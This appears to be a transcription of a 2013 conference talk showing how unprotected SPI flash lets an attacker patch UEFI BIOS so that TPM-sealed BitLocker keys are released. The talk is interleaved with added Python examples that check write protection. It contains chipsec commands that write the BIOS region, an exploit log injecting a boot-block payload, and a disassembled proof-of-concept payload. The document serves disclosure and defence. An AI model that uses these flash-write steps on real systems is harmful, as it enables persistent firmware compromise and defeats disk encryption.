# Evil Maid Just Got Angrier: Why Full-Disk Encryption With TPM is Insecure on Many Systems

Yuriy Bulygin (@c7zero)

CanSecWest 2013





#### Outline

1. UEFI BIOS
2. Measured/Trusted Boot
3. The Real World: Bypassing Measured/Trusted Boot
4. Windows BitLocker with TPM
5. Secure Boot
6. What Else?
7. Anything We Can Do?

### Legacy BIOS Boot

- CPU Reset vector in ROM → legacy boot block
- Basic CPU, chipset initialization →
- Initialize Cache-as-RAM, load and run from cache →
- Initialize DIMMs, create address map.. →
- Enumerate PCIe devices.. →
- Execute Option ROMs on expansion cards →
- Load and execute MBR →
- 2nd Stage Boot Loader / OS Loader → OS
  - or a Full-Disk Encryption Application
  - or a Bootkit

### Security of Legacy BIOS

#### Huh?

- Old architecture
- Unsigned BIOS updates by user-mode applications
- Unsigned Option ROMs
- Unprotected configuration
- SMI Handlers.. have issues [18]
- No Secure Boot

# Unified Extensible Firmware Interface (UEFI)

- CPU reset vector in ROM →
- Startup/Security Phase (SEC) →
- Pre-EFI Initialization (PEI) Phase (chipset/CPU initialization) →
- Driver Execution Environment (DXE) Phase →
- OEM UEFI applications (diagnostics, update) →
- Boot Device Selection (BDS) Phase → UEFI Boot Manager
- OS Boot Manager / Loader or Built-in UEFI Shell

Security features UEFI provides:

- A framework for signing UEFI binaries, including native option ROMs
- Signed capsule update
- Framework for TCG measured (trusted) boot
- UEFI 2.3.1 defines secure (verified, authenticated) boot
- Protected configuration (authenticated variables, boot-time only..)
- SEC+PEI encapsulate security-critical functions (recovery, TPM init, capsule update, configuration locking, SMRAM init/protection..)

UEFI specifies all the needed pieces, but it's largely up to platform manufacturers to use them, as well as the protections offered by hardware.

What good are your signed UEFI capsules if the firmware ROM is writeable by everyone?


# Measured (Trusted) Boot

#### Example: TPM Based Full-Disk Encryption Solutions

- Pre-OS firmware components are hashed (measured)
- Measurements are initiated by startup firmware (Static CRTM)
- Measurements are stored in a secure location (TPM PCRs)
- Secrets (encryption keys) are encrypted by the TPM and bound to PCR measurements (*sealed*)

- Can only be decrypted (*unsealed*) with same PCR measurements stored in the TPM
- This chain guarantees that firmware hasn't been tampered with

### Windows BitLocker

- Encrypting the entire Windows operating system drive on the hard disk. BitLocker encrypts all user files and system files on the operating system drive, including the swap files and hibernation files.
- Checking the integrity of early boot components and boot configuration data. On computers that have a Trusted Platform Module (TPM) version 1.2, BitLocker uses the enhanced security capabilities of the TPM to help ensure that your data is accessible only if the computer's boot components appear unaltered and the encrypted disk is located in the original computer.

http://technet.microsoft.com/en-us/library/ee449438(v=ws.10).aspx

### BitLocker with Trusted Platform Module

- Volume Key used to encrypt drive contents is encrypted by the TPM based on measurements of pre-OS firmware
- If any pre-OS firmware component was tampered with, TPM wouldn't decrypt the key
- Ensures malicious BIOS/OROM/MBR doesn't log the PIN or fake recovery/PIN screen

### Implementation of a Measured Boot

Initial startup FW at the CPU reset vector (the Static CRTM) begins the chain; each stage is measured into a PCR before it runs (legacy BIOS counterparts in brackets):

- PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
  - UEFI Boot and Runtime Services, Embedded EFI OROMs
  - SMI Handlers, Static ACPI Tables
- PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
- PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]
- PCR[3] ← [Option ROM Data and Configuration]
- PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]
- PCR[5] ← EFI Variables, GUID Partition Table [MBR Partition Table]
- PCR[6] ← State Transitions and Wake Events
- PCR[7] ← UEFI Secure Boot keys (PK/KEK) and variables (dbx..)
- PCR[8] ← TPM Aware OS specific hashes [NTFS Boot Sector]
- PCR[9] ← TPM Aware OS specific hashes [NTFS Boot Block]
- PCR[10] ← [Boot Manager]
- PCR[11] ← BitLocker Access Control
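
The extend-and-seal mechanics behind the PCR list above, as an added example that is not code from the talk, a TPM stack or BitLocker: it replays a constructed event log into TPM 1.2 style SHA-1 PCRs, seals a volume key to a PCR selection (the selection 0, 2, 4, 5, 8, 9, 10, 11 is an assumption chosen to cover the components listed), and shows that a modified MBR measured by an honest CRTM is refused, while the PCRs themselves only ever reflect the digests the measuring firmware reports.

```python
"""Added example, not from the talk: replay a measured-boot event log into
TPM 1.2 style PCRs and check a sealed secret against the resulting values."""
import hashlib

PCR_COUNT = 24
PCR_INIT = b"\x00" * 20  # TPM 1.2 PCRs are 20-byte SHA-1 registers, zero at reset
# PCRs the sealed key is bound to (assumption; covers the components on the slide)
SEALED_PCRS = (0, 2, 4, 5, 8, 9, 10, 11)

# Constructed stand-ins for the pre-OS components the slide maps to PCRs.
COMPONENTS = {
    0: [b"CRTM+UEFI firmware (PEI/DXE)", b"SMI handlers, static ACPI tables"],
    1: [b"SMBIOS/ACPI tables, platform config"],
    2: [b"option ROM from expansion card"],
    4: [b"MBR / UEFI OS loader"],
    5: [b"partition table"],
    8: [b"NTFS boot sector"],
    9: [b"NTFS boot block"],
    10: [b"boot manager"],
    11: [b"BitLocker access control"],
}


def extend(pcr, digest):
    """TPM_Extend: PCR_new = SHA-1(PCR_old || digest); event order matters."""
    return hashlib.sha1(pcr + digest).digest()


def build_event_log(components):
    """What a correct CRTM logs: (pcr_index, SHA-1 of each component image)."""
    return [(idx, hashlib.sha1(img).digest())
            for idx, images in sorted(components.items()) for img in images]


def replay_log(event_log):
    """Recompute every PCR from the event log, as the TPM would hold them."""
    pcrs = [PCR_INIT] * PCR_COUNT
    for idx, digest in event_log:
        pcrs[idx] = extend(pcrs[idx], digest)
    return pcrs


def pcr_composite(pcrs, indices):
    """Digest over the selected PCRs; the sealing policy compares against it."""
    return hashlib.sha1(b"".join(pcrs[i] for i in indices)).digest()


def seal(secret, pcrs, indices=SEALED_PCRS):
    """Bind a secret to PCR values. A real TPM also encrypts it under the SRK;
    here the binding is modelled by recording the composite it must match."""
    return {"indices": indices, "composite": pcr_composite(pcrs, indices),
            "secret": secret}


def unseal(blob, pcrs):
    """Release the secret only if the current PCRs match the sealed composite."""
    if pcr_composite(pcrs, blob["indices"]) != blob["composite"]:
        return None
    return blob["secret"]


def boot_outcomes():
    """Seal a volume key to a known-good boot, then replay three scenarios."""
    good_log = build_event_log(COMPONENTS)
    blob = seal(b"volume-master-key", replay_log(good_log))

    # 1. Untouched platform: same log, same PCRs, key released.
    untouched = unseal(blob, replay_log(good_log))

    # 2. Modified MBR measured by an honest CRTM: PCR[4] differs, key withheld.
    tampered = dict(COMPONENTS)
    tampered[4] = [b"MBR / UEFI OS loader (modified)"]
    detected = unseal(blob, replay_log(build_event_log(tampered)))

    # 3. PCRs reflect only what the measuring firmware reports. If the CRTM
    #    itself is replaced and reports the original digests, the TPM sees
    #    the known-good log and cannot tell the difference (the talk's point).
    forged_report = unseal(blob, replay_log(good_log))

    return {"untouched": untouched, "detected": detected,
            "forged_report": forged_report}


if __name__ == "__main__":
    for scenario, result in boot_outcomes().items():
        print(f"{scenario:14s} -> {'key released' if result else 'unseal refused'}")
```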


Startup UEFI BIOS firmware at the reset vector is inherently trusted to initiate the chain of measurements or signature verification.

But it's firmware and can be updated.

If subverted, all measurements in the chain can be forged, allowing firmware modifications to go undetected.

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect the SPI Flash descriptor, lock the SPI controller configuration, and not introduce a single bug in all of this, of course.

#### Follow The Guidelines

NIST Special Publication 800-147, **BIOS Protection Guidelines**: Recommendations of the National Institute of Standards and Technology (David Cooper, William Polk, Andrew Regenscheid, Murugiah Souppaya)

1. Write Protection of BIOS Region in SPI Flash
2. Read/Write Protection via SPI Protected Range Registers
3. SPI Flash Region Access Control Defined in Flash Descriptor

#### Write Protecting BIOS Region in SPI Flash

#### 13.1.32 BIOS_CNTL—BIOS Control Register (LPC I/F—D31:F0)

| Offset Address: | DCh | Attribute:  | R/WLO, R/W, RO |
|-----------------|-----|-------------|----------------|
| Default Value:  | 20h | Size:       | 8 bit          |
| Lockable:       | No  | Power Well: | Core           |

| Bit | Description |
|-----|-------------|
| 7:6 | Reserved |
| 5   | SMM BIOS Write Protect Disable (SMM_BWP) — R/WLO.<br>This bit set defines when the BIOS region can be written by the host.<br>0 = BIOS region SMM protection is disabled. The BIOS Region is writable regardless if processors are in SMM or not. (Set this field to 0 for legacy behavior)<br>1 = BIOS region SMM protection is enabled. The BIOS Region is not writable unless all processors are in SMM. |
| 1   | BIOS Lock Enable (BLE) — R/WLO.<br>0 = Setting the BIOSWE will not cause SMIs.<br>1 = Enables setting the BIOSWE bit to cause SMIs. Once set, this bit can only be cleared by a PLTRST#. |
| 0   | BIOS Write Enable (BIOSWE) — R/W.<br>0 = Only read cycles result in Firmware Hub I/F cycles.<br>1 = Access to the BIOS space is enabled for both read and write cycles. When this bit is written from a 0 to a 1 and BIOS Lock Enable (BLE) is also set, an SMI# is generated. This ensures that only SMI code can update BIOS. |

http://www.intel.com/content/www/us/en/chipsets/6-chipset-c200-chipset-datasheet.html

#### SPI Protected Range Registers

#### 21.1.13 PR0—Protected Range 0 Register (SPI Memory Mapped Configuration Registers)

| Memory Address: | SPIBAR + 74h | Attribute: | R/W     |
|-----------------|--------------|------------|---------|
| Default Value:  | 00000000h    | Size:      | 32 bits |

**Note:** This register can not be written when the FLOCKDN bit is set to 1.

| Bit   | Description |
|-------|-------------|
| 31    | Write Protection Enable — R/W. When set, this bit indicates that the Base and Limit fields in this register are valid and that writes and erases directed to addresses between them (inclusive) must be blocked by hardware. The base and limit fields are ignored when this bit is cleared. |
| 30:29 | Reserved |
| 28:16 | Protected Range Limit — R/W. This field corresponds to FLA address bits 24:12 and specifies the upper limit of the protected range. Address bits 11:0 are assumed to be FFFh for the limit comparison. Any address greater than the value programmed in this field is unaffected by this protected range. |
| 15    | Read Protection Enable — R/W. When set, this bit indicates that the Base and Limit fields in this register are valid and that reads directed to addresses between them (inclusive) must be blocked by hardware. The base and limit fields are ignored when this bit is cleared. |
| 14:13 | Reserved |
| 12:0  | Protected Range Base — R/W. This field corresponds to FLA address bits 24:12 and specifies the lower base of the protected range. Address bits 11:0 are assumed to be 000h for the base comparison. Any address less than the value programmed in this field is unaffected by this protected range. |
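
How the two register types above combine into a pass/fail verdict on BIOS write protection, as an added example that is neither the talk's code nor chipsec's: it decodes BIOS_CNTL (BIOSWE, BLE, SMM_BWP) and PRx (WP enable, 4 KiB-granular base and limit) using the bit layouts from the datasheet excerpts, then checks the first two NIST SP 800-147 items plus the FLOCKDN note against constructed register snapshots; the BIOS region base and limit are the ones the later chipsec output reports, the register values themselves are constructed.

```python
"""Added example (not from the talk or from chipsec): decode the BIOS_CNTL
and SPI PRx register fields quoted on the slides and decide whether the
BIOS region in SPI flash is write-protected."""

# BIOS_CNTL (LPC I/F D31:F0, offset DCh) bit fields from the datasheet excerpt.
BIOSWE = 1 << 0    # BIOS Write Enable: writes to BIOS space allowed
BLE = 1 << 1       # BIOS Lock Enable: setting BIOSWE raises an SMI
SMM_BWP = 1 << 5   # BIOS region writable only while all CPUs are in SMM

# PRx (SPIBAR + 74h, 78h, 7Ch, 80h, 84h) bit fields.
PR_WPE = 1 << 31   # Write Protection Enable
PR_RPE = 1 << 15   # Read Protection Enable
FLA_MASK = 0x1FFF  # 13-bit fields hold flash linear address bits 24:12


def decode_pr(value):
    """(write_protect, read_protect, base, limit) for one PRx value.
    Limit bits 28:16 are FLA 24:12 with the low 12 bits implied FFFh;
    base bits 12:0 are FLA 24:12 with the low 12 bits implied 000h."""
    write_protect = bool(value & PR_WPE)
    read_protect = bool(value & PR_RPE)
    limit = (((value >> 16) & FLA_MASK) << 12) | 0xFFF
    base = (value & FLA_MASK) << 12
    return write_protect, read_protect, base, limit


def encode_pr(base, limit, write_protect=True, read_protect=False):
    """Inverse of decode_pr: a PRx value covering [base, limit] (4 KiB granular)."""
    value = (((limit >> 12) & FLA_MASK) << 16) | ((base >> 12) & FLA_MASK)
    if write_protect:
        value |= PR_WPE
    if read_protect:
        value |= PR_RPE
    return value


def bios_cntl_protects(bios_cntl):
    """SP 800-147 item 1: host writes to the BIOS region are blocked when
    SMM_BWP is set, or when BLE is set while BIOSWE is clear (an attempt to
    set BIOSWE then traps to the SMI handler instead of opening the region)."""
    if bios_cntl & SMM_BWP:
        return True
    return bool(bios_cntl & BLE) and not (bios_cntl & BIOSWE)


def pr_covers_bios(pr_values, bios_base, bios_limit):
    """Item 2: at least one PRx with WP enabled must span the whole BIOS region."""
    for value in pr_values:
        write_protect, _, base, limit = decode_pr(value)
        if write_protect and base <= bios_base and limit >= bios_limit:
            return True
    return False


def check_bios_wp(bios_cntl, pr_values, bios_base, bios_limit, flockdn):
    """Return (passed, findings); the findings echo the failing chipsec output."""
    findings = []
    if not bios_cntl_protects(bios_cntl):
        findings.append("BIOS region write protection is disabled")
    if not pr_covers_bios(pr_values, bios_base, bios_limit):
        findings.append("None of the SPI protected ranges write-protect BIOS region")
    if not flockdn:
        findings.append("SPI configuration is not locked (FLOCKDN=0): PRx can be rewritten")
    return not findings, findings


# BIOS region as reported on the slide; register snapshots are constructed.
BIOS_BASE, BIOS_LIMIT = 0x00180000, 0x003FFFFF

AS_FOUND = {   # nothing protects the region, as in the failing bios_wp output
    "bios_cntl": 0x00, "prs": [0] * 5, "flockdn": False,
}
HARDENED = {   # what a platform following SP 800-147 would look like
    "bios_cntl": BLE | SMM_BWP,
    "prs": [encode_pr(BIOS_BASE, BIOS_LIMIT), 0, 0, 0, 0],
    "flockdn": True,
}


def evaluate(snapshot):
    return check_bios_wp(snapshot["bios_cntl"], snapshot["prs"],
                         BIOS_BASE, BIOS_LIMIT, snapshot["flockdn"])


if __name__ == "__main__":
    for name, snap in (("as found", AS_FOUND), ("hardened", HARDENED)):
        passed, findings = evaluate(snap)
        print(name, "PASSED" if passed else "FAILED", findings)
```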

### Welcome to the Desert of the Real (ASUS P8P67-M PRO)

Screenshot: ASUS System Information. Motherboard: Manufacturer ASUSTEK COMPUTER INC., Product P8P67-M PRO, Version Rev X.0x. BIOS: Manufacturer American Megatrends Inc., dated 04/24/2012.


#### Let's Just Try to Write to UEFI BIOS, Shall We?

Screenshot: an Administrator command prompt running `python chipsec_flash.py read 0x3FF440 0x80` (0x80 bytes of the BIOS region at 0x3FF440, saved to csw.bin), then `python chipsec_flash.py write 0x3FF440 csw.bin`; the tool reports BIOS write protection "enabled but not locked. Disabling.." and the write completes.

#### Hey! We've Succeeded!




#### I Have a Suspicion..

```text
OS      : Windows 7 6.1.7600 AMD64
Chipset : VID: 8086, DID: 0100, Name: Sandy Bridge (SNB), Long Name: Sandy Bridge CPU / Cougar Point PCH
[+] loaded common.bios_wp
[+] imported chipsec.modules.common.bios_wp
[x][ ===================================
[x][ ===================================
[-] FAILED: BIOS region write protection is disabled
[*] BIOS Region: Base = 0x00180000, Limit = 0x003FFFFF
SPI Protected Ranges
PRx (offset) | Value    | Base     | Limit    | WP? | RP?
PR0 (74)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR1 (78)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR2 (7C)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR3 (80)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR4 (84)     | 00000000 | 00000000 | 00000000 | 0   | 0
[-] FAILED: None of the SPI protected ranges write-protect BIOS region
```

#### NIST BIOS Protection Guidelines Recap

#### 3.1.3 Integrity Protection

To prevent unintended or malicious modification of the system BIOS outside the authenticated BIOS update process, the RTU and the system BIOS (excluding configuration data used by the system BIOS that is stored in non-volatile memory) shall be **protected from unintended or malicious modification** with a mechanism that cannot be overridden outside of an authenticated BIOS update. The protection mechanism shall itself be protected from unauthorized modification.

The authenticated BIOS update mechanism shall be protected from unintended or malicious modification by a mechanism that is at least as strong as that protecting the RTU and the system BIOS.

The protection mechanism shall **protect relevant regions of the system flash memory containing the system BIOS** prior to executing firmware or software that can be modified without using an authenticated update mechanism or a secure local update mechanism. Protections should be enforced by hardware mechanisms that are not alterable except by an authorized mechanism.

http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf


#### UEFI Updates Aren't Exactly Signed Either

Screenshot: ASUS Update, "Update BIOS from file". Selected BIOS file: C:\prv\P8P67-M-PRO-ASUS-3602_sos.ROM. Current BIOS and Selected BIOS both show Model Name P8P67-M PRO, Version 3602, Release Date 04/24/2012.

#### NIST BIOS Protection Guidelines Recap

#### 3.1.1 BIOS Update Authentication

The authenticated BIOS update mechanism employs digital signatures to ensure the authenticity of the **BIOS update image**. To update the BIOS using the authenticated BIOS update mechanism, there shall be a Root of Trust for Update (RTU) that contains a signature verification algorithm and a key store that includes the public key needed to verify the signature on the BIOS update image. The key store and the signature verification algorithm shall be stored in a protected fashion on the computer system and shall be modifiable only using an authenticated update mechanism or a secure local update mechanism as outlined in Section 3.1.2.

http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf



#### Attack Outline Against Encrypted OS Drive

1. While the owner is not watching and the system is shut down..
2. adversary plugs in and boots into a USB thumb drive
3. which auto-launches an exploit directly modifying the UEFI BIOS in unprotected SPI Flash
4. Gets out before the owner notices someone is messing with the system
5. Upon next boot, the patched UEFI BIOS sends the expected 'good' measurements of all pre-boot components to the TPM PCRs
6. TPM unseals the encryption key as the measurements are correct

# Angry Evil Maid

#### Booting From Multiple OS Drives?

1. System has multiple encrypted bootable OS drives (including bootable USB thumb drives)
2. One OS is loaded while the other OS drives remain encrypted
3. Malware that compromised the loaded OS exploits weak BIOS protections and modifies the UEFI BIOS
4. When an OS is booted from another encrypted drive, the compromised UEFI BIOS submits the expected 'good' measurements to the TPM
5. TPM unseals the OS drive encryption key as the measurements are correct
6. OS boots on top of compromised firmware logging the PIN

# The Original Boot Block

```asm
_10:FFFFFABB CC                db 0CCh
_10:FFFFFABC                   ; ---------------------------------------------------------------------------
_10:FFFFFABC
_10:FFFFFABC out80_Init_PCIEXBAR:                      ; CODE XREF: _10:ptr_out80_Init_PCIEXBAR j
_10:FFFFFABC B0 02             mov     al, 2
_10:FFFFFABE E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFAC0 BE CD FA FF FF    mov     esi, 0FFFFFACDh
_10:FFFFFAC5 0F 6E FE          movd    mm7, esi
_10:FFFFFAC8 E9 97 00 00 00    jmp     Init_PCIEXBAR
_10:FFFFFACD                   ; ---------------------------------------------------------------------------
_10:FFFFFACD
_10:FFFFFACD out80_Find_Load_Patch:
_10:FFFFFACD B0 07             mov     al, 7
_10:FFFFFACF E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFAD1 BE DB FA FF FF    mov     esi, 0FFFFFADBh
_10:FFFFFAD6 0F 6E FE          movd    mm7, esi
_10:FFFFFAD9 EB 3D             jmp     short ptr_Find_Load_Patch
_10:FFFFFADB                   ; ---------------------------------------------------------------------------
_10:FFFFFADB B0 08             mov     al, 8
_10:FFFFFADD E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFADF BE E9 FA FF FF    mov     esi, 0FFFFFAE9h
_10:FFFFFAE4 0F 6E FE          movd    mm7, esi
_10:FFFFFAE7 EB 49             jmp     short write_MSR_1AD_to_CMOS
_10:FFFFFAE9                   ; ---------------------------------------------------------------------------
_10:FFFFFAE9 B0 0A             mov     al, 0Ah
_10:FFFFFAEB E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFAED BE FA FA FF FF    mov     esi, 0FFFFFAFAh
_10:FFFFFAF2 0F 6E FE          movd    mm7, esi
_10:FFFFFAF5 E9 BF 00 00 00    jmp     loc_FFFFFBB9
_10:FFFFFAFA                   ; ---------------------------------------------------------------------------
_10:FFFFFAFA B0 03             mov     al, 3
_10:FFFFFAFC E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFAFE B0 09             mov     al, 9
_10:FFFFFB00 E6 80             out     80h, al         ; manufacturer's diagnostic checkpoint
_10:FFFFFB02 BE 0F FB FF FF    mov     esi, 0FFFFFB0Fh
_10:FFFFFB07 0F 6E FE          movd    mm7, esi
_10:FFFFFB0A E9 B7 00 00 00    jmp     send_IPI_thru_LAPIC
_10:FFFFFB0F                   ; ---------------------------------------------------------------------------
_10:FFFFFB0F B0 0B             mov     al, 0Bh
```

Each stub writes a POST code to port 80h, stashes its return address in MM7 (there is no stack yet: the boot block runs before Cache-as-RAM is set up) and jumps on to the next early-init routine.

# Now beeping SOS.. (not exactly a PIN logger)

```asm
Hiew: P8P67-M-PRO-ASUS-3602_sos.ROM                FRO  32  003FF6E8   www.hiew.ru
003FF6E6: 0000              add     [eax],al
003FF6E8: B0B6              mov     al,0B6          ; PIT channel 2, mode 3 (square wave)
003FF6EA: E643              out     043,al
003FF6EC: 66B8D011          mov     ax,011D0        ; reload value 0x11D0 -> ~262 Hz tone
003FF6F0: E642              out     042,al
003FF6F2: 8AC4              mov     al,ah
003FF6F4: E642              out     042,al
003FF6F6: BB09000000        mov     ebx,9           ; 9 beeps: 3 short, 3 long, 3 short
003FF6FB: EB07              jmps    0003FF704
003FF6FD: B9FFFF0100        mov     ecx,00001FFFF   ; long beep delay
003FF702: EB05              jmps    0003FF709
003FF704: B900800000        mov     ecx,000008000   ; short beep delay
003FF709: E461              in      al,061
003FF70B: 0C03              or      al,3            ; speaker + timer gate on
003FF70D: E661              out     061,al
003FF70F: 49                dec     ecx
003FF710: 75FD              jnz     0003FF70F
003FF712: E461              in      al,061
003FF714: 24FC              and     al,-4           ; speaker off
003FF716: E661              out     061,al
003FF718: B9FFFF0100        mov     ecx,00001FFFF   ; pause between beeps
003FF71D: 49                dec     ecx
003FF71E: 75FD              jnz     0003FF71D
003FF720: 4B                dec     ebx
003FF721: 740C              je      0003FF72F
003FF723: 83FB06            cmp     ebx,6
003FF726: 77DC              ja      0003FF704       ; beeps 9..7: short
003FF728: 83FB03            cmp     ebx,3
003FF72B: 77D0              ja      0003FF6FD       ; beeps 6..4: long
003FF72D: EBD5              jmps    0003FF704       ; beeps 3..1: short
003FF72F: 90909090909090909090909090909090  nop     ; NOP slide up to the original code
...
```

# Writing Payload to Early BIOS in SPI Flash

```text
OS      : Windows 7 6.1.7600 AMD64
Chipset:
  VID: 8086
  DID: 0100
  Name: Sandy Bridge (SNB)
  Long Name: Sandy Bridge CPU / Cougar Point PCH

[+] loaded exploits.bios.bitlocker
[+] imported chipsec.modules.exploits.bios.bitlocker
[*] Reading 0x1000-byte block from SPI at FLA = 0x3FF000
[*] Done reading block from SPI at FLA = 0x3FF000
[*] Filling with 0x109 bytes of NOP slide..
[*] Injecting 0x47 bytes of payload at offset 0x6E8 in the block
[*] Checking protection of UEFI BIOS region in SPI flash
[spi] UEFI BIOS write protection enabled but not locked. Disabling..
[spi] UEFI BIOS write protection is disabled
[*] Erasing original 0x1000-byte SPI block at FLA = 0x3FF000
[*] Done erasing block of SPI flash
[*] Writing SPI block with payload to FLA = 0x3FF000 (payload at 0x3FF6E8)
[*] Done writing modified UEFI BIOS boot block in SPI flash
[*] Done writing modified UEFI BIOS boot block volume
```

Note the line "write protection enabled but not locked": BIOSWE was clear, but because BLE was also clear, ring-0 code could simply set BIOSWE again and write the boot block.

## BitLocker Decrypted Drive With Patched UEFI BIOS



### But That P67 Board Is Just Too Old



## ASUS P8Z77-V PRO

Yes! UEFI BIOS updates are signed. NIST will be happy.

### Or Not Yet

```text
[+] imported chipsec.modules.common.bios_wp
[x][ =======================================================================
[x][ Module: BIOS Region Write Protection
[x][ =======================================================================
[*] BIOS Control (BDF 0:31:0 + 0xDC) = 0x08
    [05] SMM_BWP = 0 (SMM BIOS Write Protection)
    [04] TSS     = 0 (Top Swap Status)
    [01] BLE     = 0 (BIOS Lock Enable)
    [00] BIOSWE  = 0 (BIOS Write Enable)
[-] FAILED: BIOS region write protection is disabled

[*] BIOS Region: Base = 0x00180000, Limit = 0x007FFFFF
SPI Protected Ranges
------------------------------------------------------------
PRx (offset) | Value    | Base     | Limit    | WP? | RP?
------------------------------------------------------------
PR0 (74)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR1 (78)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR2 (7C)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR3 (80)     | 00000000 | 00000000 | 00000000 | 0   | 0
PR4 (84)     | 00000000 | 00000000 | 00000000 | 0   | 0

[-] FAILED: None of the SPI protected ranges write-protect BIOS region
fs0:\chipsec-1.0> _
```

- The problem applies to any Full-Disk Encryption solution that relies on the TPM, not just Windows BitLocker
- It is also not specific to ASUS; I just happen to use a few of those systems

## What About Secure Boot?

#### UEFI 2.3.1 / Windows 8 Secure Boot

- UEFI FW verifies digital signatures of non-embedded UEFI executables
- Signed UEFI drivers on adaptor cards/disk (Option ROMs), UEFI apps, OS Loaders
- Leverages Authenticode signing over PE/COFF binaries
- Configuration stored in NVRAM as Authenticated Variables (PK, KEK, db, dbx, SecureBoot)

- UEFI Spec, Chapter 27
- Windows 8 Logo requirements for Secure Boot

### Windows 8 Logo Requirements

#### System.Fundamentals.Firmware.UEFISecureBoot

8. Mandatory. Secure firmware update process. If the platform firmware is to be serviced, it must follow a secure update process. To ensure the lowest level code layer is not compromised, the platform must support a secure firmware update process that ensures only signed firmware components that can be verified using the signature database (and are not invalidated by the forbidden signature database) can be installed. UEFI Boot Services variables must be hardware-protected and preserved across flash updates. The Flash ROM that stores the UEFI BIOS code must be protected. Flash that is typically open at reset (to allow for authenticated firmware updates) must subsequently be locked before running any unauthorized code. The firmware update process must also protect against rolling back to insecure versions, or non-production versions that may disable secure boot or include nonproduction keys. A physically present user may however override the rollback protection manually. Further, it is recommended that manufacturers writing BIOS code adhere to the NIST guidelines set out in NIST SP 800-147 (http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf), BIOS Protection Guidelines, which provides guidelines for building features into the BIOS that help protect it from being modified or corrupted by attackers. For example, by using cryptographic digital signatures to authenticate BIOS updates.

## What Else?

- BIOS Rootkit [5,6,7,15]
- SMM Rootkit [8,9]
- ACPI rootkit [12]
- Mebromi BIOS/Option ROM malware in the wild [14]
- If we don't properly protect the BIOS, malware will. Imagine BIOS malware restoring a TDL4-infected MBR on each boot

## Anything We Can Do?

#### If you care about Full-Disk Encryption or sneaky little UEFI malware

- ASUS is releasing fixed revision of UEFI BIOS. Update!
- Check with platform vendor if BIOS updates are signed and if BIOS meets NIST SP800-147 requirements
- Systems certified for Windows 8 are likely to sign UEFI updates
- Check UEFI BIOS protections on your system
- Do not leave your system unattended
- Do not enter PIN if concerned that BIOS was compromised
- Stop using systems with legacy BIOS
- NIST should have a test suite to validate SP800-147 requirements
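"Check UEFI BIOS protections on your system" means reading the same two things the chipsec bios_wp output above decodes: the BIOS_CNTL register (BIOSWE, BLE, SMM_BWP) and the SPI Protected Range registers PR0..PR4. The following added example (not chipsec's code and not from the talk) reimplements that verdict in plain Python so the logic is visible: it is fed the values printed for the P8Z77-V PRO above, plus a constructed hardened configuration. The PRx bit layout (WPE in bit 31, limit in bits 28:16, RPE in bit 15, base in bits 12:0, both in 4 KiB units) is an assumption taken from the Intel PCH datasheets of that era; the register values you plug in should come from your own system.

```python
# Bit fields of the PCH BIOS_CNTL register (PCI 0:31:0, offset 0xDC), as the
# chipsec bios_wp module above decodes them.
BIOSWE = 1 << 0    # BIOS Write Enable: 1 = BIOS region of SPI flash is writable
BLE = 1 << 1       # BIOS Lock Enable: setting BIOSWE raises an SMI the firmware can veto
SMM_BWP = 1 << 5   # SMM BIOS Write Protection: writes allowed only from SMM

# SPI Protected Range registers PR0..PR4 (SPIBAR + 0x74..0x84). Assumed layout
# from the Cougar Point / Panther Point PCH datasheets: bit 31 WPE, bits 28:16
# limit, bit 15 RPE, bits 12:0 base; base and limit are in 4 KiB units.
PR_WPE = 1 << 31
PR_RPE = 1 << 15
PR_FIELD_MASK = 0x1FFF


def decode_pr(value):
    """Return (write_protected, read_protected, base, limit) for one PRx value."""
    base = (value & PR_FIELD_MASK) << 12
    limit = (((value >> 16) & PR_FIELD_MASK) << 12) | 0xFFF
    return bool(value & PR_WPE), bool(value & PR_RPE), base, limit


def fully_covered(ranges, base, limit):
    """True if [base, limit] lies entirely inside the union of (base, limit) ranges."""
    need = base
    for b, l in sorted(ranges):
        if b > need:
            break                      # hole before this range: not covered
        need = max(need, l + 1)
        if need > limit:
            return True
    return need > limit


def bios_region_protection(bios_cntl, prs, bios_base, bios_limit):
    """Same question chipsec's bios_wp asks: is the BIOS region write-protected
    by BIOS_CNTL, by SPI protected ranges, or not at all? Returns the verdict
    and the findings a practitioner would want printed."""
    bioswe, ble, smm_bwp = (bool(bios_cntl & f) for f in (BIOSWE, BLE, SMM_BWP))
    findings = []

    bc_protected = ble and not bioswe
    if bioswe:
        findings.append("BIOSWE=1: BIOS region is writable from the OS")
    elif not ble:
        findings.append("BIOSWE=0 but BLE=0: write protection enabled but not locked; "
                        "ring-0 code can set BIOSWE and rewrite the boot block")
    elif not smm_bwp:
        findings.append("BLE=1 without SMM_BWP: protection rests on the SMI handler "
                        "clearing BIOSWE again after every attempt")

    wp_ranges = [(b, l) for wpe, _, b, l in map(decode_pr, prs) if wpe]
    pr_protected = fully_covered(wp_ranges, bios_base, bios_limit)
    if not pr_protected:
        findings.append("no SPI protected range write-protects the whole BIOS region")

    return {"bios_cntl": bc_protected, "protected_ranges": pr_protected,
            "protected": bc_protected or pr_protected, "findings": findings}


# Register values exactly as chipsec printed them for the P8Z77-V PRO above.
P8Z77_V_PRO = dict(bios_cntl=0x08, prs=[0, 0, 0, 0, 0],
                   bios_base=0x00180000, bios_limit=0x007FFFFF)

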